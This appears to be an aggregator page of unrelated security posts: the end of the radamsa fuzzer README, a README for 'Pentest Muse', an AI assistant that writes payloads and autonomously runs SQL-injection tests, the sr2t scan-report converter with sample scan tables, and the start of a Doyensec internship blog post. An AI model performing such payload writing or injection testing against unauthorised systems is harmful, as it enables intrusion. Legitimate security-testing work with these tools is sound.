CVE-2014-8449 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3707 cURL Symeon Paraschoudis
CVE-2014-7933 Chrome OUSPG
CVE-2015-0797 Mozilla Firefox OUSPG
CVE-2015-0813 Mozilla Firefox OUSPG
CVE-2015-1220 Chrome OUSPG
CVE-2015-1224 Chrome OUSPG
CVE-2015-2819 Sybase SQL vah_13 (ERPScan)
CVE-2015-2820 SAP Afaria vah_13 (ERPScan)
CVE-2015-7091 Apple QuickTime Pedro Ribeiro ([email protected])
CVE-2015-8330 SAP PCo agent Mathieu GELI (ERPScan)
CVE-2016-1928 SAP HANA hdbxsengine Mathieu Geli (ERPScan)
CVE-2016-3979 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-3980 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-9562 SAP NetWeaver @vah_13 (ERPScan)
CVE-2017-5371 SAP ASE OData @vah_13 (ERPScan)
CVE-2017-9843 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2017-9845 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2018-0101 Cisco ASA WebVPN/AnyConnect @saidelike (NCC Group)

We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting many of the above-mentioned issues; CERT-FI for feedback and disclosure handling; and the other users, projects and vendors who have responsibly taken care of the uncovered bugs.

Thanks

The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.

  • Darkkey
  • Branden Archer

Troubleshooting

Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.

You can also drop by at #radamsa on Freenode if you have questions or feedback.

Issues in your own programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day), chances are that others will too.

Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.

FAQ

Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.

Q: Will you make a graphical version of radamsa?

A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.

Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.

Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions on this page.

Q: Radamsa does not compile using the instructions on this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email ([email protected]) or IRC (#radamsa on freenode).

Q: I used fuzzer X and found many more bugs in program Y than Radamsa did.
A: Cool. Let me know about it ([email protected]) and I'll try to hack something X-ish into radamsa if it's general purpose enough. It'd also be useful to get some of the samples you used, to check how well radamsa does, because it might be overfitting some heuristic.

Q: Can I get support for using radamsa?
A: You can send email to [email protected] or check if some of us happen to be hanging around at #radamsa on freenode.

Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but it is usually not tested properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.

Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track of which outputs it has already generated; instead it relies on varying mutations to keep the outputs varied enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.
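A quick way to measure the duplicate rate in a batch of generated files is to hash each output and count collisions. A minimal sketch, where the `outputs` list is placeholder sample data standing in for files produced by radamsa:

```python
# Hash every output and count how many repeat an earlier one.
import hashlib
from collections import Counter

outputs = [b"aaa", b"abc", b"aaa", b"xyz"]  # placeholder sample data
digests = Counter(hashlib.sha256(o).hexdigest() for o in outputs)
duplicates = sum(n - 1 for n in digests.values() if n > 1)
print(duplicates)  # number of outputs identical to an earlier one
```

A high duplicate rate on your own corpus is exactly the kind of case worth reporting.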

Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future-proof to let radamsa decide the details.

Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.

Q: Is this the last question?
A: Yes.

Warnings

Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can cause arbitrarily bad things to happen. A typical unexpected issue arises when a file manager, automatic indexer or antivirus scanner tries to do something with the fuzzed data before it is intentionally tested. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.

Not safe when used as prescribed.

This product may contain faint traces of parenthesis.



Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals


Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


Pentest Muse Web App

In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information and makes a good AI assistant for your pentesting work.

Disclaimer

This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Requirements

  • Python 3.12 or later
  • Necessary Python packages as listed in requirements.txt

Setup

Standard Setup

  1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse
cd PentestMuse

  2. Install the required packages:

pip install -r requirements.txt

Alternative Setup (Package Installation)

Install Pentest Muse as a Python Package:

pip install .

Running the Application

Chat Mode (Default)

In chat mode, you can chat with Pentest Muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

python run_app.py

or

pmuse

Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, use:

python run_app.py agent

or

pmuse agent

Selection of Language Models

Managed APIs

You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the Pentest Muse CLI, and the program will prompt you to log in.

OpenAI API keys

Alternatively, you can choose to use your own OpenAI API keys. To do this, simply add the argument --openai-api-key=[your openai api key] when starting the program.

Contact

For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at [email protected] or join our discord. Your input is invaluable in helping us improve and evolve.



Sr2T - Converts Scanning Reports To A Tabular Format


Scanning reports to tabular (sr2t)

This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

  1. Nmap (XML);
  2. Nessus (XML);
  3. Nikto (XML);
  4. Dirble (XML);
  5. Testssl (JSON);
  6. Fortify (FPR).
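To illustrate the kind of conversion sr2t performs, here is a minimal sketch that flattens Nmap XML into CSV rows. This is only an illustration, not sr2t's actual implementation, and the embedded XML snippet is a made-up example:

```python
# Flatten a (toy) Nmap XML report into CSV rows: one row per open port.
import csv
import io
import xml.etree.ElementTree as ET

NMAP_XML = """<nmaprun>
  <host>
    <address addr="192.168.23.78" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="53"><state state="open"/><service name="domain"/></port>
      <port protocol="tcp" portid="88"><state state="open"/><service name="kerberos-sec"/></port>
    </ports>
  </host>
</nmaprun>"""

def nmap_to_rows(xml_text):
    """Yield (ip, port, proto, service, state) tuples from Nmap XML."""
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        ip = host.find("address").get("addr")
        for port in host.iter("port"):
            yield (
                ip,
                port.get("portid"),
                port.get("protocol"),
                port.find("service").get("name"),
                port.find("state").get("state"),
            )

buf = io.StringIO()
writer = csv.writer(buf)
writer.writerow(["ip address", "port", "proto", "service", "state"])
writer.writerows(nmap_to_rows(NMAP_XML))
print(buf.getvalue())
```

The same flattening idea applies to the other supported input formats: parse, extract a fixed set of fields per finding, emit one row each.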

Rationale

This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.

Dependencies

  1. argparse (dev-python/argparse);
  2. prettytable (dev-python/prettytable);
  3. python (dev-lang/python);
  4. xlsxwriter (dev-python/xlsxwriter).

Install

Using Pip:

pip install --user sr2t

Usage

You can use sr2t in two ways:

  • When installed as a package, call the installed script: sr2t --help.
  • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]
[--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]

Converting scanning reports to a tabular format

optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to output a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the output XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).

specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.

Example

A few examples

Nessus

To produce an XLSX format:

$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

Or to output a CSV file:

$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,445,57608,SMB Signing not required,2,X

Nmap

To produce an XLSX format:

$ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+-----------------+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192.168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+

Or to output a CSV file:

$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
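The host-by-port presence matrix above can be derived from a flat list of (ip, port) pairs. A small sketch of that pivot (illustrative only, not sr2t's code, with made-up sample data):

```python
# Pivot (ip, port) pairs into a presence matrix: one row per host,
# one column per observed port, "X" marking an open port.
open_ports = {
    ("192.168.23.78", 53), ("192.168.23.78", 88),
    ("192.168.228.211", 80),
}

ports = sorted({p for _, p in open_ports})
hosts = sorted({ip for ip, _ in open_ports})
header = ["ip address"] + [str(p) for p in ports]
rows = [[ip] + ["X" if (ip, p) in open_ports else "" for p in ports]
        for ip in hosts]
```

Writing `header` and `rows` through the csv module yields output in the same shape as the file above.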

Nikto

To produce an XLSX format:

$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce a text tabular format to stdout:

$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

Or to output a CSV file:

$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X
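Note that the multi-line description fields above are quoted, so a standards-compliant CSV reader reassembles each one into a single record. Parsing a fragment of the output above:

```python
# The quoted description spans two physical lines but parses back
# into one logical record.
import csv
import io

sample = (
    'target ip,target hostname,target port,description,annotations\n'
    '192.168.178.10,192.168.178.10,80,'
    '"The X-XSS-Protection header is not defined. This header can hint to the user\n'
    'agent to protect against some forms of XSS",X\n'
)
rows = list(csv.DictReader(io.StringIO(sample)))
```

This is why the file is best opened with a CSV-aware tool rather than split on newlines.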

Dirble

To produce an XLSX format:

$ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | false | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

Or to output a CSV file:

$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X

Testssl

To produce an XLSX format:

$ sr2t --testssl example/testssl.json -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

Or to output a CSV file:

$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

Fortify

To produce an XLSX format:

$ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce a text tabular format to stdout:

$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

Or to output a CSV file:

$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

Donate

  • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


Internship Experiences at Doyensec

The following blog post gives a voice to our 2023 interns and their experiences with us.

Aleandro

During my last high school year I took part in the Cyberchallenge.it program, whose goal is to introduce young students to the world of offensive cybersecurity, via lessons and CTF competitions. After that experience, some friends and I founded the r00tstici CTF team, attempting to bring some cybersecurity culture to the south of Italy. We also organized various workshops and events at the University of Salento.

Once I moved from the south of Italy to Pisa, to study at the university, I joined the fibonhack CTF team. I then also started working as a developer and penetration tester on small projects, both inside the university and outside.

Getting recruited

During April 2023, the Doyensec Twitter account posted a call for summer interns. Since I had been following Doyensec for months, after Luca’s talk at No Hat 2022, I submitted my application. This was both because I was bored with the university routine and because I wanted to try a job in the research field. It was a good fit, since I was coming from an environment of development and freelance pentesting, alongside CTF competitions.

The selection process I went through has already been described, in large part, by Robert in his previous post about his internship experience. Basically it consisted of:

  • An interview with the Practice Manager
  • A technical challenge on both web and mobile topics
  • Finally, a technical interview with two different security engineers

The interview was about various aspects of application security. This ranged from web security to low level stuff like assembly and even CPU internals.

First weeks

The actual internship started with a couple of weeks of research, where I went through some web application frameworks in Rust. After completing that research, I then moved on to an actual pentest for a client. I remember the first week felt really different and challenging. The code base was so large and so filled with functionalities that I felt overwhelmed with things to test, ideas to try and scenarios to replicate. Despite the size and complexity, there were initially no vulnerabilities found. Impostor syndrome started to kick in.

Eventually, things started to improve during the second week of that engagement. While we’re a 100% remote company, sometimes we get together to work in small teams. That week, I worked in-person with Luca. He helped me understand that sometimes software is just well-written and well-architected from a security perspective. For those situations, I needed to learn how to deal with not having immediate success, the focus required for testing and how to provide value to the client despite having low severity findings. Thankfully, we eventually found good bugs in that codebase anyway :)

San Marino landscape

Research weeks

The main research topic of my internship experience was about developing internal tools. Although this project was not mainly about security, I enjoyed it a lot. Developing applications, fixing bugs and screaming about non-existent documentation is something I’ve done ever since I bought my first personal computer.

Responsibilities

It is important to note that even though you are the last one who has joined the company and have limited experience, all Doyensec team members treat you like all other employees. You could be in charge of actually talking with the client if you have any issues during an assessment, you will have to write and possibly peer review the reports, you will have to evaluate and assign severities to the vulnerabilities you’ve found, you will have your name on the report, and so on. Of course, you are assigned to work alongside more experienced engineers that will guide you through the process (Lorenzo in my case - who I would like to thank for helping me in managing the flexible schedule and for all the other advice he gave me). However, you learn the most by actually doing and making your own decisions on how to proceed and of course making errors.

To me this was a mind-blowing feeling; I did not expect to be completely part of the team, or that my opinions would matter. It was a really good approach, in my opinion. It took me a while to fit entirely into the role, but then it was fun all along the way.

Leonardo

Hi, my name is Leonardo, some of you may better know me as maitai, which is the handle that I’ve been using in the CTF scene from the start of my journey. I encountered cybersecurity while earning my Bachelor of Science in computer science. From the very first moment I was amazed by it, so I decided to dig a bit deeper into hacking, starting with the PortSwigger Academy, which literally changed my life.

Getting recruited

If you have read the previous part of this blog post you have already met Aleandro. I knew him prior to joining Doyensec, since we played together on the same CTF team: fibonhack. While I was pursuing my previous internship, Aleandro and I talked a lot regarding our jobs and what to do in the near future. One day he told me that Doyensec would have an open internship position during the winter. I was a bit scared at first, just because it would be a really huge step for me to take on such a challenge. My previous internship had already ended when Doyensec opened the position. Although I was considering pursuing a master’s degree, I was still thinking about this opportunity all the time. I didn’t want to miss such a great opportunity, so I decided to submit my application. After all, what did I have to lose? I took it as a way to really challenge myself.

After a quick interview with the Practice Manager, I was walked through the next steps in the interview process. Notably, the technical challenges were brand new: Doyensec had just rebuilt them on a new platform, and I was essentially the first candidate to ever use it.

